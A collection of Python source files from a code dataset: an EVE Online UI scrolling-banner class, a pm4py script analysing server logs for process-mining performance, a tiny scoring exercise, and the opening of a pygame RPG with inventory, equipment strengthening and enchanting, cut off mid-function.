texturePath='res:/UI/Texture/classes/CQMainScreen/autoTextGradientLeft.png', color=fadeColor, align=uiconst.TOLEFT, width=fadeWidth, state=uiconst.UI_DISABLED)\n uicls.Sprite(name='leftFade', parent=self, texturePath='res:/UI/Texture/classes/CQMainScreen/autoTextGradientRight.png', color=fadeColor, align=uiconst.TORIGHT, width=fadeWidth, state=uiconst.UI_DISABLED)\n self.textCont = uicls.Container(name='textCont', parent=self, align=uiconst.CENTERLEFT, height=self.fontSize)\n if textList:\n self.SetTextList(textList)\n\n def SetTextList(self, textList, funcList = None, funcKeywordsList = None):\n self.textCont.Flush()\n if self.scrollThread:\n self.scrollThread.kill()\n if not textList:\n return\n x = 0\n for i, text in enumerate(textList):\n if i != 0:\n bullet = uicls.Sprite(parent=self.textCont, align=uiconst.CENTERLEFT, texturePath='res:/UI/texture/classes/CQMainScreen/bullet.png', pos=(x,\n 0,\n 11,\n 11), color=self.color)\n bulletWidth = bullet.width + 10\n else:\n bulletWidth = 0\n if funcList:\n clickFunc = funcList[i]\n else:\n clickFunc = None\n if funcKeywordsList:\n funcKeywords = funcKeywordsList[i]\n else:\n funcKeywords = None\n labelCont = uicls._AutoTextLabelCont(parent=self.textCont, clickFunc=clickFunc, funcKeywords=funcKeywords, left=x + bulletWidth, align=uiconst.TOPLEFT)\n label = uicls.Label(parent=labelCont, text='%s' % text, fontsize=self.fontSize, color=self.color)\n labelCont.width = label.width\n labelCont.height = label.height\n x += label.width + 10 + bulletWidth\n\n self.textCont.width = x\n self.textCont.height = label.height\n self.scrollThread = uthread.new(self.ScrollThread)\n\n def ScrollThread(self):\n w, h = self.GetAbsoluteSize()\n self.textCont.left = w\n while not self.destroyed:\n duration = self.textCont.width / float(self.scrollSpeed)\n uicore.animations.MorphScalar(self.textCont, 'left', startVal=w, endVal=-self.textCont.width, duration=duration, curveType=uiconst.ANIM_LINEAR, sleep=True)\n\n\nclass LabelCont(uicls.Container):\n __guid__ = 'uicls._AutoTextLabelCont'\n default_state = uiconst.UI_NORMAL\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n self.hoverFill = uicls.Fill(parent=self, color=(1.0, 1.0, 1.0, 0.0), padLeft=-5, padRight=-5)\n self.clickFunc = attributes.get('clickFunc', None)\n self.funcKeywords = attributes.get('funcKeywords', None)\n\n def OnMouseEnter(self, *args):\n if self.clickFunc:\n uicore.animations.FadeIn(self.hoverFill, endVal=0.5, duration=0.3)\n\n def OnMouseExit(self, *args):\n if self.clickFunc:\n uicore.animations.FadeOut(self.hoverFill)\n\n def OnClick(self, *args):\n if self.clickFunc:\n if self.funcKeywords:\n self.clickFunc(**self.funcKeywords)\n else:\n self.clickFunc()\n\n\nclass TextBanner(uicls.Container):\n __guid__ = 'uicls.TextBanner'\n default_height = 80\n default_align = uiconst.TOBOTTOM\n default_leftContWidth = 0\n default_scrollText = True\n default_fontSize = 30\n default_color = (0.15, 0.15, 0.15, 1.0)\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', '')\n textList = attributes.get('textList', None)\n if textList is None:\n textList = [text]\n fontSize = attributes.get('fontSize', self.default_fontSize)\n leftContWidth = attributes.get('leftContWidth', self.default_leftContWidth)\n color = attributes.get('color', self.default_color)\n self.leftCont = uicls.Container(name='leftCont', parent=self, align=uiconst.TOLEFT, width=leftContWidth)\n autoText = uicls.AutoTextScroll(parent=self, align=uiconst.TOALL, scrollSpeed=70, fontSize=fontSize, textList=textList, fadeColor=color)\n uicls.Sprite(bgParent=self, texturePath='res:/UI/Texture/Classes/CQMainScreen/autoTextGradientLeft.png', color=color)","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/eve/client/script/ui/station/captainsquarters/screenControls.py","file_name":"screenControls.py","file_ext":"py","file_size_in_byte":20219,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"70435899293","text":"from numpy.core.fromnumeric import var\nfrom pm4py.objects.conversion.log import converter as log_converter\nfrom pm4py.algo.filtering.log.variants import variants_filter\nfrom pm4py.objects.log.util import interval_lifecycle\nfrom pm4py.algo.filtering.log.variants import variants_filter\nfrom math import sqrt\nfrom random import randint\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n## Point 2\n# Since the log files are in a different format, it is necessary to make them compatible with PM4PY before processing them\ndf_web_server = pd.read_csv(\"WEB_SERVER.log\", sep=' ', header=None)\ndf_web_server[5] = (df_web_server[5] + df_web_server[6]).str.strip(\"[]\")\ndf_web_server[5] = pd.to_datetime(df_web_server[5], format='%d/%b/%Y:%H:%M:%S%z')\ndf_web_server = df_web_server.drop(labels=[0, 2, 3, 6, 9, 11, 12], axis=1)\ndf_web_server = df_web_server.rename(columns={1: \"IP\", 4: \"ID\", 5: \"TIMESTAMP\", 7: \"REQUEST\", 8: \"CODE\", 10: \"URL\"})\n\n# print(df_web_server)\n\ndf_application_server = pd.read_csv(\"APPLICATION_SERVER.log\", sep=' ', header=None)\ndf_application_server[3] = (df_application_server[3] + df_application_server[4]).str.strip(\"[]\")\ndf_application_server[3] = pd.to_datetime(df_application_server[3], format='%d/%b/%Y:%H:%M:%S%z')\ndf_application_server = df_application_server.drop(labels=[1, 2, 4, 7], axis=1)\ndf_application_server = df_application_server.rename(columns={0: \"IP\", 3: \"TIMESTAMP\", 5: \"REQUEST\", 6: \"CODE\"})\n\n# print(df_application_server)\n\ndf_joined = df_web_server.join(df_application_server[\"TIMESTAMP\"], lsuffix=\"_WS\", rsuffix=\"_AS\")\ndf_joined[\"TIME_DELTA\"] = (df_joined[\"TIMESTAMP_AS\"] - df_joined[\"TIMESTAMP_WS\"]) / pd.Timedelta(seconds=1)\n\n# print(df_joined)\n\nmy_col = [x for x in range(50)]\ndf_database_server = pd.read_csv(\"DATABASE_SERVER.log\", sep=' ', header=None, names=my_col)\ndf_database_server = df_database_server.fillna('')\ndf_database_server[0] = df_database_server[0] + ':' + df_database_server[1] + \"+0200\"\ndf_database_server[0] = pd.to_datetime(df_database_server[0], format='%Y-%m-%d:%H:%M:%S.%f%z')\n\nfor i in range(6, 17):\n df_database_server[5] = df_database_server[5] + ' ' + df_database_server[i]\n\ndel_col = [1, 2, 6]\ndel_col.extend([n for n in range(7, 50)])\ndf_database_server = df_database_server.drop(labels=del_col, axis=1)\ndf_database_server = df_database_server.rename(columns={0: \"TIMESTAMP\", 3: \"ID\", 4: \"DATABASE\", 5: \"OPERATION\"})\ndf_database_server = df_database_server[df_database_server.DATABASE == \"postgres@infinity41_sp27p\"].reset_index()\n\n# print(df_database_server)\n\n## Point 3\nsize = len(df_database_server[\"TIMESTAMP\"])\ndb_delta_times = []\ndb_timestamps = []\nfor n in range(0, size, 15):\n try:\n last_op = df_database_server.at[n+15, 'TIMESTAMP']\n except:\n last_op = df_database_server.at[size-1, \"TIMESTAMP\"]\n first_op = df_database_server.at[n, \"TIMESTAMP\"]\n time_delta = (last_op - first_op) / pd.Timedelta(seconds=1)\n db_delta_times.append(time_delta)\n db_timestamps.append(first_op)\n\n\ndf_joined[\"TIME_DELTA_DB\"] = db_delta_times[:len(df_joined)]\ndf_joined[\"TIMESTAMP_DB\"] = db_timestamps[:len(df_joined)]\n\n# print(df_joined)\n\n#Point 4\nprint(df_joined.describe())\n\nplt.subplot(2, 1, 1)\nplt.plot(df_joined.index, df_joined[\"TIME_DELTA_DB\"])\nplt.title(\"Db time delta linechart\")\n\nplt.subplot(2, 1, 2)\nplt.scatter(df_joined.index, df_joined[\"TIME_DELTA_DB\"])\nplt.xlabel(\"Request number\")\nplt.ylabel(\"Time delta\")\nplt.title(\"Db time delta scatter chart\")\n\n# plt.show()\n\n# Remove outliers\ndf_joined_size = len(df_joined)\ndf_joined = df_joined[df_joined.TIME_DELTA_DB < 5]\nprint(\"\\nPercentage of overdue cases {0:.2g}%\\n\".format((df_joined_size - len(df_joined)) / size * 100))\n\nprint(df_joined.describe())\n\n## Point 5\ndf_joined[\"ID\"] = df_joined[\"ID\"].astype(str)\ndf_joined = df_joined.rename(columns={\"ID\": \"case:concept:name\", \"REQUEST\": \"concept:name\", \"TIMESTAMP_DB\": \"time:timestamp\"})\nparameters = {log_converter.Variants.TO_EVENT_LOG.value.Parameters.CASE_ID_KEY: 'case:concept:name'}\nevent_log = log_converter.apply(df_joined, parameters=parameters, variant=log_converter.Variants.TO_EVENT_LOG)\n\n# print(event_log)\n\nevent_log = interval_lifecycle.assign_lead_cycle_time(event_log)\n\n# print(\"\\nPercentile below the safe performance score 3 sec {}%\".format(count / ))\n\nvariants = variants_filter.get_variants(event_log)\n\n# print(variants)\n\nprint('\\nEvents: {} - Cases: {} - Variants: {}'.format(df_joined_size, len(event_log), len(variants)))\n\ndef performance_analysis(variants):\n variants_scores = {}\n count = 0\n for key, value in variants.items():\n variants_scores[key] = 0\n for event in value[0]:\n variants_scores[key] += event[\"TIME_DELTA_DB\"]\n \n performance_drop_variant = max(variants_scores, key=variants_scores.get)\n\n performance_drop_value = variants_scores[performance_drop_variant]\n\n print(\"\\n{0:.2g} is the most variant performance drop\".format(performance_drop_value))\n\n plt2 = plt.figure()\n ax1 = plt2.add_subplot(111)\n ax1.plot([x for x in range(len(variants_scores))], variants_scores.values())\n # plt.show()\n\n count = 0\n for value in variants_scores.values():\n if value < 3:\n count += 1\n\n print(\"\\nPercentile under 3 sec time delta db {:.2f}%\".format(count / len(variants_scores) * 100))\n\n # Remove the variant from the dictionary for the later comparison\n for key, value in variants_scores.items():\n if value == performance_drop_value:\n del variants_scores[key]\n break\n\n return {0: performance_drop_value, \"values\": list(variants_scores.values())}\n\nperformance_drop = performance_analysis(variants)\n\n#Filter most common variants\nfiltered_log = variants_filter.filter_log_variants_percentage(event_log, percentage=0.5)\n# print(len(filtered_log))\n\nvariants_filtered = variants_filter.get_variants(filtered_log)\n# print(len(variants_filtered))\n\nperformance_analysis(variants_filtered)\nprint()\n\n## Point 6\nfor n in range(50):\n i = randint(0, len(performance_drop[\"values\"])-1)\n z = (performance_drop[0] - performance_drop[\"values\"][i])/sqrt(performance_drop[0] + performance_drop[\"values\"][i])\n if z > 1.96:\n print(\"Comparing most performance drop variant with variant number {} differences are significantly important\".format(i+1))\n\n## Point 7\n# from pm4py.algo.discovery.dfg import algorithm as dfg_discovery\n# dfg = dfg_discovery.apply(event_log)\n\n# from pm4py.visualization.dfg import visualizer as dfg_visualization\n# dfg = dfg_discovery.apply(event_log, variant=dfg_discovery.Variants.PERFORMANCE)\n# parameters = {dfg_visualization.Variants.PERFORMANCE.value.Parameters.FORMAT: \"png\"}\n# gviz = dfg_visualization.apply(dfg, log=event_log, variant=dfg_visualization.Variants.PERFORMANCE, parameters=parameters)\n# dfg_visualization.save(gviz, \"dfg.png\")","repo_name":"Davydhh/Zucchetti-Process-Mining","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3114482687","text":"n=int(input())\r\nscore_c = score_s = 100\r\n\r\nfor _ in range(n):\r\n c,s= map(int, input().split(' '))\r\n if cs:\r\n score_s-=c\r\n else: continue\r\n \r\n\r\nprint(score_c)\r\nprint(score_s)\r\n","repo_name":"uranusneo/2021PS","sub_path":"10103.py","file_name":"10103.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69805922333","text":"import pygame\nimport time\nimport sys\nimport json\nimport os\nimport re\nimport random\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nRED = 255, 0, 0\nGREY = 128, 128, 128\nCREAM = 230, 230, 230\nYELLOW = 255, 255, 0\nsize = width, height = 1100, 800 # size of the window\nfps = 300 # frames per second for game\npath = os.getcwd()\nfiles = os.listdir(path)\n\npygame.init()\nscreen = pygame.display.set_mode(size)\nfclock = pygame.time.Clock()\n\nfont = pygame.font.Font(\"ShenYunSuXinTi-2.ttf\", 32)\nfont_small = pygame.font.Font(\"ShenYunSuXinTi-2.ttf\", 20)\nicon = pygame.image.load(\"./image/icon.png\")\npygame.display.set_icon(icon)\ncharacter_images = pygame.image.load(\"./image/角色.png\")\ncharacter_image = character_images.get_rect()\ncharacter_image = character_image.move(width - 60, height - 60)\nbag_images = pygame.image.load(\"./image/背包.png\")\nbag_image = bag_images.get_rect()\nbag_image = bag_image.move(width - 120, height - 60)\nachievement_images = pygame.image.load(\"./image/成就.png\")\nachievement_image = achievement_images.get_rect()\nachievement_image = achievement_image.move(width - 180, height - 60)\nstrengthen_images = pygame.image.load(\"./image/强化.png\")\nstrengthen_image = strengthen_images.get_rect()\nstrengthen_image = strengthen_image.move(width / 2 - 90, 100)\nsale_images = pygame.image.load(\"./image/出售.png\")\nsale_image = sale_images.get_rect()\nsale_image = sale_image.move((width - 200) / 3 - 140, 100)\nenchant_images = pygame.image.load(\"./image/附魔.png\")\nenchant_image = enchant_images.get_rect()\nenchant_image = enchant_image.move((width - 200) / 1.5 + 160, 100)\nshoe_images = pygame.image.load(\"./image/鞋子.png\")\nsword_images = pygame.image.load(\"./image/剑.png\")\nhelmet_images = pygame.image.load(\"./image/头盔.png\")\nring_images = pygame.image.load(\"./image/戒指.png\")\narmor_images = pygame.image.load(\"./image/护甲.png\")\nwand_images = pygame.image.load(\"./image/法杖.png\")\nbow_images = pygame.image.load(\"./image/弓箭.png\")\ntitle_images = pygame.image.load(\"./image/称号.png\")\nbig_health_images = pygame.image.load(\"./image/大红药.png\")\nsmall_health_images = pygame.image.load(\"./image/小红药.png\")\nbig_magic_images = pygame.image.load(\"./image/大蓝药.png\")\nsmall_magic_images = pygame.image.load(\"./image/小蓝药.png\")\nbig_attack_images = pygame.image.load(\"./image/攻击药剂(大).png\")\nsmall_attack_images = pygame.image.load(\"./image/攻击药剂(小).png\")\nenchant_material_images = pygame.image.load(\"./image/附魔材料.png\")\nvocational_material_images = pygame.image.load(\"./image/职业材料.png\")\nmission_material_images = pygame.image.load(\"./image/任务材料.png\")\npygame.display.set_caption(\"无名之地\")\n\n\nclass Material:\n def __init__(self, name):\n self.name = name\n\n def create_new_material(self, attack, defence, health, magic, critical, speed, luck, num, value, type):\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.num = num\n self.value = value\n self.type = type\n\n\nclass Baggage:\n def __init__(self, capacity):\n self.capacity = capacity\n self.objects = []\n self.amount = 0\n\n\nclass Prop:\n def __init__(self, name):\n self.name = name\n\n def create_new_prop(self, attack, defence, health, magic, critical, speed, luck, grow_attack, grow_defence,\n grow_health, grow_magic, grow_critical, grow_speed, grow_luck, value, pos, level=1,\n exp=0, need_exp=10, enchant_time=5, is_wear=0, numb=1):\n \"\"\"numb 表示此装备的序列号\"\"\"\n \"\"\"-1 = 法杖, 1 = 剑, 0 = 弓箭, 2 = helmet, 3 = armor, 4 = shoes, 5 = ornament, 6 = title\"\"\"\n # is_wear = 0,1,2,3 0 for not wearing, 1,2,3 for character 1, 2, 3\n self.level = level\n self.exp = exp\n self.need_exp = need_exp\n self.pos = pos\n self.enchant_time = enchant_time # 剩余的附魔次数\n self.grow_attack = grow_attack\n self.grow_defence = grow_defence\n self.grow_health = grow_health\n self.grow_magic = grow_magic\n self.grow_critical = grow_critical\n self.grow_speed = grow_speed\n self.grow_luck = grow_luck\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.is_wear = is_wear\n self.value = value\n self.numb = numb\n\n def up_level(self, exp):\n self.exp += exp\n while self.exp >= self.need_exp:\n self.value += self.need_exp//2\n self.level += 1\n self.exp = self.exp - self.need_exp\n self.need_exp *= 2\n self.attack += self.grow_attack\n self.defence += self.grow_defence\n self.health += self.grow_health\n self.magic += self.grow_magic\n self.critical += self.grow_critical\n self.speed += self.grow_speed\n self.luck += self.grow_luck\n\n\nclass Drug:\n def __init__(self, name):\n self.name = name\n\n def create_new_drug(self, attack, defence, health, speed, magic, num, value):\n self.num = num\n self.attack = attack\n self.defence = defence\n self.health = health\n self.speed = speed\n self.magic = magic\n self.value = value\n\n\nclass Character:\n def __init__(self, name):\n self.name = name\n\n def create_new_character(self, attack, defence, health, magic, critical, speed, luck, insight, grow_attack,\n grow_defence, grow_health, grow_magic, grow_critical, grow_speed, grow_luck, grow_insight,\n level=1, exp=0, need_exp=10, position=[]):\n self.level = level\n self.exp = exp\n self.need_exp = need_exp\n self.position = position\n self.grow_attack = grow_attack\n self.grow_defence = grow_defence\n self.grow_health = grow_health\n self.grow_magic = grow_magic\n self.grow_critical = grow_critical\n self.grow_speed = grow_speed\n self.grow_luck = grow_luck\n self.grow_insight = grow_insight\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.insight = insight\n\n def up_level(self, exp):\n self.exp += exp\n while self.exp >= self.need_exp:\n self.level += 1\n self.exp = self.exp - self.need_exp\n self.need_exp *= 2\n self.attack += self.grow_attack\n self.defence += self.grow_defence\n self.health += self.grow_health\n self.magic += self.grow_magic\n self.critical += self.grow_critical\n self.speed += self.grow_speed\n self.luck += self.grow_luck\n self.insight += self.grow_insight\n\n def character_cur_ability(self):\n \"\"\"set cur_ability\"\"\"\n self.cur_attack = self.attack\n self.cur_defence = self.defence\n self.cur_health = self.health\n self.cur_speed = self.speed\n self.cur_magic = self.magic\n self.cur_critical = self.critical\n\n\ndef load_file():\n \"\"\"存档读取\"\"\"\n if not os.path.exists('fileSave.json'):\n with open('fileSave.json', 'a') as f:\n characters = []\n drug = []\n props = []\n materials = []\n dic = {'plot': 0, 'money': 0, 'characters': characters, 'drug': drug, 'props': props, 'materials': materials}\n dic = json.dumps(dic, indent=4, ensure_ascii=False)\n f.write(dic)\n with open('fileSave.json', 'r', encoding='utf-8') as file_object:\n contents = json.load(file_object)\n return contents\n\n\ndef down_file(contents):\n \"\"\"保存存档\"\"\"\n contents = json.dumps(contents, indent=4, ensure_ascii=False)\n with open('fileSave.json', 'w', encoding='utf-8') as file_object:\n \"\"\"覆盖原存档\"\"\"\n file_object.write(contents)\n\n\ndef make_lists(contents, props_list, drug_list, characters_list, materials_list):\n \"\"\"存档变列表\"\"\"\n for j in contents['characters']:\n ch = Character(j['name'])\n ch_prop = []\n for i in j['position']:\n prop = Prop(i['name'])\n prop.create_new_prop(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n i['luck'],\n i['grow_attack'], i['grow_defence'], i['grow_health'], i['grow_magic'],\n i['grow_critical'],\n i['grow_speed'], i['grow_luck'], i['value'], i['pos'], i['level'], i['exp'],\n i['need_exp'], i['enchant_time'], i['is_wear'], i['numb'])\n ch_prop.append(prop)\n ch.create_new_character(j['attack'], j['defence'], j['health'], j['magic'], j['critical'], j['speed'],\n j['luck'], j['insight'], j['grow_attack'], j['grow_defence'], j['grow_health'],\n j['grow_magic'], j['grow_critical'], j['grow_speed'], j['grow_luck'], j['grow_insight'],\n j['level'], j['exp'], j['need_exp'], ch_prop)\n characters_list.append(ch)\n for i in contents['props']:\n prop = Prop(i['name'])\n prop.create_new_prop(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'], i['luck'],\n i['grow_attack'], i['grow_defence'], i['grow_health'], i['grow_magic'], i['grow_critical'],\n i['grow_speed'], i['grow_luck'], i['value'], i['pos'], i['level'], i['exp'],\n i['need_exp'], i['enchant_time'], i['is_wear'], i['numb'])\n props_list.append(prop)\n for i in contents['drug']:\n drug = Drug(i['name'])\n drug.create_new_drug(i['attack'], i['defence'], i['health'], i['speed'], i['magic'], i['num'], i['value'])\n drug_list.append(drug)\n for i in contents['materials']:\n material = Material(i['name'])\n material.create_new_material(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n i['luck'], i['num'], i['value'], i['type'])\n materials_list.append(material)\n\n\ndef show_lines(lines, t):\n for i in range(len(lines)):\n texts = font.render(lines[i], True, BLACK)\n text = texts.get_rect()\n text.center = (width/2, 100 + i*200)\n screen.blit(texts, text)\n pygame.display.update() # watch out its position\n time.sleep(t)\n\n\ndef show_words(words, coord, font, color):\n texts = font.render(words, True, color)\n text = texts.get_rect()\n text.center = (coord[0], coord[1])\n screen.blit(texts, text)\n\n\ndef show_attr(character, coord):\n show_words('经验:' + str(character.exp) + '/' + str(character.need_exp), (coord[0] + 72, coord[1]), font, BLACK)\n show_words('攻击:' + str(character.attack), (coord[0], coord[1] + 50), font, BLACK)\n show_words('防御:' + str(character.defence), (coord[0] + 145, coord[1] + 50), font, BLACK)\n show_words('生命:' + str(character.health), (coord[0], coord[1] + 100), font, BLACK)\n show_words('魔法:' + str(character.magic), (coord[0] + 145, coord[1] + 100), font, BLACK)\n show_words('暴击:' + str(character.critical), (coord[0], coord[1] + 150), font, BLACK)\n show_words('速度:' + str(character.speed), (coord[0] + 145, coord[1] + 150), font, BLACK)\n show_words('幸运:' + str(character.luck), (coord[0], coord[1] + 200), font, BLACK)\n show_words('洞视:' + str(character.insight), (coord[0] + 145, coord[1] + 200), font, BLACK)\n show_words('等级:' + str(character.level), (coord[0], coord[1] + 250), font, BLACK)\n\n\ndef refresh_lists(baggage, props_list, drug_list, materials_list):\n \"\"\"背包存入列表\"\"\"\n props_list.clear()\n drug_list.clear()\n materials_list.clear()\n for i in baggage.objects:\n if Prop == type(i):\n props_list.append(i)\n elif Drug == type(i):\n drug_list.append(i)\n elif Material == type(i):\n materials_list.append(i)\n\n\ndef refresh_content(contents, characters_list, props_list, drug_list, materials_list):\n \"\"\"列表变存档\"\"\"\n contents['characters'].clear()\n contents['drug'].clear()\n contents['props'].clear()\n contents['materials'].clear()\n for i in characters_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'critical': i.critical, 'speed': i.speed, 'luck': i.luck,\n 'insight': i.insight, 'level': i.level, 'exp': i.exp, 'need_exp': i.need_exp,\n 'grow_attack': i.grow_attack, 'grow_defence': i.grow_defence, 'grow_health': i.grow_health,\n 'grow_magic': i.grow_magic, 'grow_critical': i.grow_critical, 'grow_speed': i.grow_speed,\n 'grow_luck': i.grow_luck, 'grow_insight': i.grow_insight, 'position': i.position}\n prop_dic = []\n for j in dic['position']:\n prop = {'name': j.name, 'attack': j.attack, 'defence': j.defence, 'health': j.health, 'magic': j.magic,\n 'critical': j.critical, 'speed': j.speed, 'luck': j.luck, 'level': j.level,'exp': j.exp,\n 'need_exp': j.need_exp, 'grow_attack': j.grow_attack, 'grow_defence': j.grow_defence,\n 'grow_health': j.grow_health, 'grow_magic': j.grow_magic, 'grow_critical': j.grow_critical,\n 'grow_speed': j.grow_speed, 'grow_luck': j.grow_luck, 'pos': j.pos, 'value': j.value,\n 'is_wear': j.is_wear, 'enchant_time': j.enchant_time, 'numb': j.numb}\n prop_dic.append(prop)\n dic['position'] = prop_dic\n content['characters'].append(dic)\n for i in drug_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'speed': i.speed, 'value': i.value, 'num': i.num}\n content['drug'].append(dic)\n for i in props_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'critical': i.critical, 'speed': i.speed, 'luck': i.luck, 'level': i.level,\n 'exp': i.exp, 'need_exp': i.need_exp, 'grow_attack': i.grow_attack, 'grow_defence': i.grow_defence,\n 'grow_health': i.grow_health, 'grow_magic': i.grow_magic, 'grow_critical': i.grow_critical,\n 'grow_speed': i.grow_speed, 'grow_luck': i.grow_luck, 'pos': i.pos, 'value': i.value,\n 'is_wear': i.is_wear, 'enchant_time': i.enchant_time, 'numb': i.numb}\n content['props'].append(dic)\n for i in materials_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health, 'critical': i.critical,\n 'magic': i.magic, 'speed': i.speed, 'value': i.value, 'num': i.num, 'luck': i.luck, 'type': i.type}\n content['materials'].append(dic)\n\n\ndef add_prop_character(character, prop, num):\n \"\"\"人物装备道具\"\"\"\n character.attack += prop.attack\n character.defence += prop.defence\n character.health += prop.health\n character.magic += prop.magic\n character.critical += prop.critical\n character.luck += prop.luck\n character.speed += prop.speed\n for i in character.position:\n if prop.pos <= 1:\n if i.pos <= 1:\n remove_prop_character(character, i)\n break\n else:\n if i.pos == prop.pos:\n remove_prop_character(character, i)\n break\n if prop.is_wear != 0:\n remove_prop_character(character_list[prop.is_wear-1], prop)\n character.position.append(prop)\n prop.is_wear = num\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.is_wear = prop.is_wear\n for i in character_list:\n if i.name == character.name:\n i.position = character.position\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n\n\ndef remove_prop_character(character, prop):\n \"\"\"移除装备\"\"\"\n for i in character.position:\n if i.name == prop.name:\n character.position.remove(i)\n prop.is_wear = 0\n for i in character_list:\n if i.name == character.name:\n i.position = character.position\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.is_wear = 0\n character.attack -= prop.attack\n character.defence -= prop.defence\n character.health -= prop.health\n character.magic -= prop.magic\n character.critical -= prop.critical\n character.luck -= prop.luck\n character.speed -= prop.speed\n\n\ndef strengthen_prop(prop):\n \"\"\"强化装备\"\"\"\n level = prop.level\n chance = 100 - ((level - 1) * 10)\n if level == 10:\n return 2 # 2 for out of range\n if content['money'] < baggage.objects[chose_num].need_exp:\n return 3 # 3 for lack of money\n content['money'] -= baggage.objects[chose_num].need_exp\n rand = random.randint(1, 100)\n if rand <= chance:\n prop.up_level(prop.need_exp)\n if prop.is_wear != 0:\n for i in character_list[prop.is_wear - 1].position:\n if i.name == prop.name and i.numb == prop.numb:\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n i.level = prop.level\n i.need_exp = prop.need_exp\n i.exp = prop.exp\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n i.level = prop.level\n i.need_exp = prop.need_exp\n i.exp = prop.exp\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n return 1 # 1 for success\n else:\n return 0 # 0 for fail\n\n\ndef enchant_prop(prop, material):\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.enchant_time -= 1\n i.attack += material.attack\n i.defence += material.defence\n i.health += material.health\n i.magic += material.magic\n i.critical += material.critical\n i.speed += material.speed\n i.luck += material.luck\n i.value += material.value // 2\n if prop.is_wear != 0:\n for i in character_list[prop.is_wear - 1].position:\n if i.name == prop.name and i.numb == prop.numb:\n i.enchant_time = prop.enchant_time\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n\n\ndef is_new(contents):\n new = contents[\"plot\"]\n plot_1 = [\"一觉醒来,你不知道自己身处何处,\", \"甚至自己是何许人也亦无从得知,世界犹如混沌般恍惚。\", \"徘徊于这谜一般的大陆上,你决定只身探索,寻找真相......\"]\n if new == 0:\n contents[\"plot\"] = 1\n \"\"\"测试为0,实际为1\"\"\"\n screen.fill(CREAM)\n show_lines(plot_1, 2)\n pygame.display.update()\n fclock.tick(fps)\n down_file(contents)\n\n\ndef draw_window():\n pygame.draw.rect(screen, BLACK, (100, 50, width - 200, height - 200), 4)\n \"\"\"rect stand for (x,y,width,height)\"\"\"\n pygame.draw.rect(screen, BLACK, (width - 130, 50, 30, 30), 4)\n pygame.draw.line(screen, RED, (width - 125, 55), (width - 105, 75), 4)\n pygame.draw.line(screen, RED, (width - 105, 55), (width - 125, 75), 4)\n pygame.display.update()\n fclock.tick(fps)\n\n\ndef close_window():\n mouse_pos = pygame.mouse.get_pos()\n mouse_pressed = pygame.mouse.get_pressed()\n for event in pygame.event.get(): # magic move\n if event.type == pygame.QUIT: # close the window\n content['baggage'] = baggage.amount # put into fileSave\n refresh_content(content, character_list, prop_list, drug_list, material_list)\n down_file(content)\n sys.exit()\n if width - 130 < mouse_pos[0] < width - 100 and 50 < mouse_pos[1] < 80 and mouse_pressed[0] == 1:\n return 1\n\n\ndef show_image(item_list_image, coord, id, num):\n dic = {'-1': wand_images, '0': bow_images, '1': sword_images, '2': helmet_images, '3': armor_images,\n '4': shoe_images, '5': ring_images, '6': title_images, '大红药': big_health_images,\n '小红药': small_health_images, '大蓝药': big_magic_images, '小蓝药': small_magic_images,\n '小攻击药': small_attack_images, '大攻击药': big_attack_images, '附魔材料': enchant_material_images,\n '职业材料': vocational_material_images, '任务材料': mission_material_images}\n item_list_image.append(dic[id].get_rect())\n item_list_image[num] = item_list_image[num].move(coord)\n screen.blit(dic[id], item_list_image[num])\n return item_list_image\n\n\ndef show_object(baggage):\n item_list_image = []\n j = 0\n for i in baggage.objects:\n coord = j % 6 * 150 + 150, j // 6 * 150 + 70\n if type(i) == Prop:\n item_list_image = show_image(item_list_image, coord, str(i.pos), j)\n if i.is_wear > 0:\n pygame.draw.line(screen, RED, (j % 6 * 150 + 115, j // 6 * 150 + 65), (j % 6 * 150 + 125, j // 6 * 150\n + 75), 4)\n pygame.draw.line(screen, RED, (j % 6 * 150 + 125, j // 6 * 150 + 